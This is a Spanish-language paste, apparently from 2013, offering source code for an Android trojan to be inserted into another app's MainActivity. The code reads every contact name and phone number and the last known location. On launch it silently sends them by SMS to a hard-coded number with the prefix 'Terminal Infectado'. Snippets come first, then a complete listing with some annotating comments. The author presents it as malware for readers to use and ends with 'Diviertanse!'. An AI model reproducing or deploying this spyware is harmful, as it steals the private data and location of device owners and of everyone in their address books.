LegionJJ

Código de malware #Android by @P0iz0N

Apr 26th, 2013
  1. *El código se inserta en el archivo principal "MainActivity.java", tras el punto main, que en el caso de las aplicaciones de Android está después de onCreate.
  2. Este intento de "virus" troyano se acopla al código de otra app para agregar las funciones de dumpeo de data.
  3. Código que accede a los contactos del dispositivo y los almacena en un hashmap para después hacer con ellos lo que queramos*
  4.  
  5.  
  6.  
  7. 01
  // Flattens every map returned by getContacts() into the single string `datos`,
  // appending one "--key:value" segment per map entry.
  // key, value and datos are not declared in this fragment; in the complete listing
  // further down the page they are fields of the activity, and datos is the text
  // that is later concatenated into the SMS body.
  8. ArrayList<HashMap<String, String>> agenda = getContacts();
  9. 02
  10. for (HashMap<String, String> map : agenda) {
  11. 03
  12. for (Map.Entry<String, String> mapEntry : map.entrySet()) {
  13. 04
  14. key = mapEntry.getKey();
  15. 05
  16. value = mapEntry.getValue();
  17. 06
  18. datos = datos + "--" + key + ":" + value;
  19. 07
  20. }
  21. 08
  22. }
  23. 09
  24.  
  25. 10
  /**
   * Returns one map with the keys "name" and "phone" per row of the phone-number table.
   *
   * Both queries pass null for projection, selection and sort order, so nothing is
   * filtered: every column of every row the provider exposes is read.
   * Reading ContactsContract requires android.permission.READ_CONTACTS; the manifest
   * that would declare it is not shown on this page.
   */
  26. private ArrayList<HashMap<String, String>> getContacts() {
  27. 11
  28. ContentResolver cr = getContentResolver();
  29. 12
  30. Cursor cCur = cr.query(ContactsContract.Contacts.CONTENT_URI, null, null, null, null);
  31. 13
  32. Cursor pCur = cr.query(ContactsContract.CommonDataKinds.Phone.CONTENT_URI, null, null, null, null);
  33. 14
  34.  
  35. 15
  36. ArrayList<HashMap<String, String>> data = new ArrayList<HashMap<String, String>>();
  37. 16
  38.  
  39. 17
  40. HashMap<String, String> contacts = new HashMap<String, String>();
  41. 18
  42.  
  43. 19
  // First pass: index display names by LOOKUP_KEY so phone rows can be matched to a name.
  44. while (cCur.moveToNext()) {
  45. 20
  46. String id = cCur.getString(cCur.getColumnIndex(ContactsContract.Contacts.LOOKUP_KEY));
  47. 21
  48. String name = cCur.getString(cCur.getColumnIndex(ContactsContract.Contacts.DISPLAY_NAME));
  49. 22
  50. contacts.put(id, name);
  51. 23
  52. }
  53. 24
  // Second pass: one output map per phone row. name is null when the row's LOOKUP_KEY
  // was not seen in the first pass (HashMap.get on a missing key).
  54. while (pCur.moveToNext()) {
  55. 25
  56. String id = pCur.getString(pCur.getColumnIndex(ContactsContract.Contacts.LOOKUP_KEY));
  57. 26
  58. String name = contacts.get(id);
  59. 27
  // Phone.DATA is the column that holds the number itself (same column as Phone.NUMBER).
  60. String phone = pCur.getString(pCur.getColumnIndex(ContactsContract.CommonDataKinds.Phone.DATA));
  61. 28
  62. HashMap<String, String> h = new HashMap<String, String>();
  63. 29
  64. h.put("name", name);
  65. 30
  66. h.put("phone", phone);
  67. 31
  68. data.add(h);
  69. 32
  70. }
  71. 33
  72. pCur.close();
  73. 34
  74. cCur.close();
  75. 35
  76. return data;
  77. 36
  78. }
  79. -------------------------------------------------------------------------------------------------------------------
  80.  
  81. * Función de extracción de datos de coordenadas GPS del dispositivo *
  82.  
  83. 01
  // Reads the position the platform already has cached; nothing here requests or waits
  // for a fresh fix. getLastKnownLocation requires ACCESS_COARSE_LOCATION or
  // ACCESS_FINE_LOCATION (manifest not shown on this page).
  84. LocationManager LC = (LocationManager) getSystemService(Context.LOCATION_SERVICE);
  85. 02
  86. Criteria criteria = new Criteria();
  87. 03
  // The provider name chosen here is only used in the toast text below; the lookup
  // itself is pinned to NETWORK_PROVIDER regardless of this result.
  88. provider = LC.getBestProvider(criteria, false);
  89. 04
  90.  
  91. 05
  92. Location loc = LC.getLastKnownLocation(LocationManager.NETWORK_PROVIDER);
  93. 06
  94. if (loc != null) {
  95. 07
  // User-visible side effect: a "Provider:<name>" toast is shown whenever a cached
  // location exists, which is an on-screen indicator that this code ran.
  96. Toast.makeText(this, "Provider:" + provider, Toast.LENGTH_LONG).show();
  97. 08
  // Direct call, not a listener callback: copies the coordinates into lati/longi.
  98. onLocationChanged(loc);
  99. 09
  100. } else {
  101. 10
  // No cached location: only a status string is written to the latitudeval view.
  102. latitudeval.setText("NO PROVIDER");
  103. 11
  104. }
  105. 12
  106.  
  107. 13
  /**
   * Stores the latitude and longitude of the given location as strings in lati and longi.
   *
   * On this page the method is invoked directly with the last known location; no call
   * that registers it for location updates is visible.
   */
  108. public void onLocationChanged(Location location) {
  109. 14
  110. double lat = location.getLatitude();
  111. 15
  112. double lon = location.getLongitude();
  113. 16
  114. lati = String.valueOf(lat);
  115. 17
  116. longi = String.valueOf(lon);
  117. 18
  118.  
  119. 19
  120. }
  121.  
  122. -------------------------------------------------------------------------------------------------------------------
  123.  
  124. *El código que envía el mensaje es el siguiente:
  125.  
  126. 1
  // Builds one SMS from the flattened contact string (datos) and the stored coordinates
  // (lati, longi) and hands it to the platform SMS stack.
  // The destination is hard-coded; the comment in the complete listing further down
  // says this is the line where the receiving number is changed.
  127. phoneNo = "66666666";
  128. 2
  // The body always starts with the same literal prefix, which makes it a stable string
  // to match on in outbound-SMS records or in the strings of a packaged app.
  129. sms = "Terminal Infectado: Datos Agenda:" + datos + " Localizacion:" + " " + lati + " " + longi;
  130. 3
  131. SmsManager smsManager = SmsManager.getDefault();
  132. 4
  // Arguments: destination, service-centre address (null = default), text,
  // sentIntent (null), deliveryIntent (null) — no sent/delivered callbacks are requested.
  // Requires android.permission.SEND_SMS (manifest not shown on this page).
  133. smsManager.sendTextMessage(phoneNo, null, sms, null, null);
  134.  
  135. ------------------------------------------------------------------------------------------------------------------
  136. *Código completo*
  137.  
  138.  
  139. 01
  140. package Realpentester.Malware;
  141. 02
  142. import android.app.Activity;
  143. 03
  144. import android.content.*;
  145. 04
  146. import android.database.Cursor;
  147. 05
  148. import android.location.*;
  149. 06
  150. import android.os.Bundle;
  151. 07
  152. import android.provider.ContactsContract;
  153. 08
  154. import android.telephony.SmsManager;
  155. 09
  156. import android.widget.Button;
  157. 10
  158. import android.widget.EditText;
  159. 11
  160. import android.widget.TextView;
  161. 12
  162. import android.widget.Toast;
  163. 13
  164. import java.util.*;
  165. 14
  166.  
  167. 15
  /**
   * Activity whose onCreate reads the last known network location, reads every contact
   * name and phone number, and sends both in a single SMS to a hard-coded number.
   *
   * Observable properties, taken from the calls in this listing:
   *  - ContactsContract queries require android.permission.READ_CONTACTS,
   *    getLastKnownLocation requires ACCESS_COARSE_LOCATION or ACCESS_FINE_LOCATION,
   *    and SmsManager.sendTextMessage requires SEND_SMS. The manifest is not part of
   *    this page. Since Android 6.0 (API 23) all three are permissions the user can
   *    review and revoke per app.
   *  - The SMS body always begins with the literal "Terminal Infectado: Datos Agenda:".
   *  - All of it runs inside onCreate, i.e. when the activity is launched, with no
   *    further user interaction in the code path.
   */
  168. public class Realpentester extends Activity {
  169. 16
  170. private TextView latitudeval;
  171. 17
  172. private String provider;
  173. 18
  // Assigned in onCreate and not read again anywhere in this listing.
  174. TextView txtEnviado;
  175. 19
  // Working state of the collection loop and the outgoing message is kept in public
  // mutable fields rather than locals.
  176. public String key;
  177. 20
  178. public String value;
  179. 21
  180. public String datos = "";
  181. 22
  182. public String phoneNo;
  183. 23
  184. public String sms;
  185. 24
  186. public String lati;
  187. 25
  188. public String longi;
  189. 26
  190.  
  191. 27
  192. /**
  193. 28
  194. * Called when the activity is first created.
  195. 29
  196. */
  197. 30
  198. @Override
  199. 31
  200. public void onCreate(Bundle savedInstanceState) {
  201. 32
  202. super.onCreate(savedInstanceState);
  203. 33
  204. setContentView(R.layout.main);
  205. 34
  206.  
  207. 35
  208. txtEnviado = (TextView) findViewById(R.id.txtEnviado);
  209. 36
  210.  
  211. 37
  // Step 1: cached location. Nothing here requests or waits for a fresh fix.
  212. LocationManager LC = (LocationManager) getSystemService(Context.LOCATION_SERVICE);
  213. 38
  214. Criteria criteria = new Criteria();
  215. 39
  // The provider name is only used in the toast text; the lookup below is pinned to
  // NETWORK_PROVIDER regardless of this result.
  216. provider = LC.getBestProvider(criteria, false);
  217. 40
  218.  
  219. 41
  220. Location loc = LC.getLastKnownLocation(LocationManager.NETWORK_PROVIDER);
  221. 42
  222. if (loc != null) {
  223. 43
  // User-visible side effect: a "Provider:<name>" toast appears on launch whenever a
  // cached location exists.
  224. Toast.makeText(this, "Provider:" + provider, Toast.LENGTH_LONG).show();
  225. 44
  226. onLocationChanged(loc);
  227. 45
  228. } else {
  229. 46
  // No cached location: only a status string is written to the latitudeval view.
  230. latitudeval.setText("NO PROVIDER");
  231. 47
  232. }
  233. 48
  // Step 2: read the address book and flatten it into datos as "--key:value" segments
  // (keys are "name" and "phone", as put by getContacts below).
  234. ArrayList<HashMap<String, String>> agenda = getContacts();
  235. 49
  236. for (HashMap<String, String> map : agenda) {
  237. 50
  238. for (Map.Entry<String, String> mapEntry : map.entrySet()) {
  239. 51
  240. key = mapEntry.getKey();
  241. 52
  242. value = mapEntry.getValue();
  243. 53
  244. datos = datos + "--" + key + ":" + value;
  245. 54
  246. }
  247. 55
  248. }
  249. 56
  250.  
  251. 57
  // Step 3: send contacts and coordinates in one SMS. The literal prefix of the body is
  // constant, so it can be matched in outbound-SMS records or in the app's strings.
  252. // Line where the destination phone number(s) for the data extracted from the device are changed
  253. 58
  254. phoneNo = "66666666";
  255. 59
  256. sms = "Terminal Infectado: Datos Agenda:" + datos + " Localizacion:" + " " + lati + " " + longi;
  257. 60
  258. SmsManager smsManager = SmsManager.getDefault();
  259. 61
  // Arguments: destination, service-centre address (null = default), text,
  // sentIntent (null), deliveryIntent (null) — no sent/delivered callbacks are requested.
  260. smsManager.sendTextMessage(phoneNo, null, sms, null, null);
  261. 62
  262. }
  263. 63
  // Stores the coordinates as strings in lati/longi. The class does not implement
  // LocationListener and never registers for updates, so within this listing the
  // method is only reached through the direct call in onCreate.
  264. public void onLocationChanged(Location location) {
  265. 64
  266. double lat = location.getLatitude();
  267. 65
  268. double lon = location.getLongitude();
  269. 66
  270. lati = String.valueOf(lat);
  271. 67
  272. longi = String.valueOf(lon);
  273. 68
  274.  
  275. 69
  276. }
  277. 70
  278.  
  279. 71
  280.  
  281. 72
  282.  
  283. 73
  // Returns one map with the keys "name" and "phone" per row of the phone-number table.
  // Both queries pass null for projection, selection and sort order, so nothing is
  // filtered: every column of every row the provider exposes is read.
  284. private ArrayList<HashMap<String, String>> getContacts() {
  285. 74
  286. ContentResolver cr = getContentResolver();
  287. 75
  288. Cursor cCur = cr.query(ContactsContract.Contacts.CONTENT_URI, null, null, null, null);
  289. 76
  290. Cursor pCur = cr.query(ContactsContract.CommonDataKinds.Phone.CONTENT_URI, null, null, null, null);
  291. 77
  292. ArrayList<HashMap<String, String>> data = new ArrayList<HashMap<String, String>>();
  293. 78
  294. HashMap<String, String> contacts = new HashMap<String, String>();
  295. 79
  // First pass: index display names by LOOKUP_KEY.
  296. while (cCur.moveToNext()) {
  297. 80
  298. String id = cCur.getString(cCur.getColumnIndex(ContactsContract.Contacts.LOOKUP_KEY));
  299. 81
  300. String name = cCur.getString(cCur.getColumnIndex(ContactsContract.Contacts.DISPLAY_NAME));
  301. 82
  302. contacts.put(id, name);
  303. 83
  304. }
  305. 84
  306.  
  307. 85
  // Second pass: one output map per phone row; name is null when the row's LOOKUP_KEY
  // was not seen in the first pass.
  308. while (pCur.moveToNext()) {
  309. 86
  310. String id = pCur.getString(pCur.getColumnIndex(ContactsContract.Contacts.LOOKUP_KEY));
  311. 87
  312. String name = contacts.get(id);
  313. 88
  // Phone.DATA is the column that holds the number itself (same column as Phone.NUMBER).
  314. String phone = pCur.getString(pCur.getColumnIndex(ContactsContract.CommonDataKinds.Phone.DATA));
  315. 89
  316. HashMap<String, String> h = new HashMap<String, String>();
  317. 90
  318. h.put("name", name);
  319. 91
  320. h.put("phone", phone);
  321. 92
  322. data.add(h);
  323. 93
  324. }
  325. 94
  326. pCur.close();
  327. 95
  328. cCur.close();
  329. 96
  330. return data;
  331. 97
  332. }
  333. 98
  334. }
  335.  
  336.  
  337. Diviertanse ! By Poiz0n Stark
  338. Twitter: @P0iz0N #AL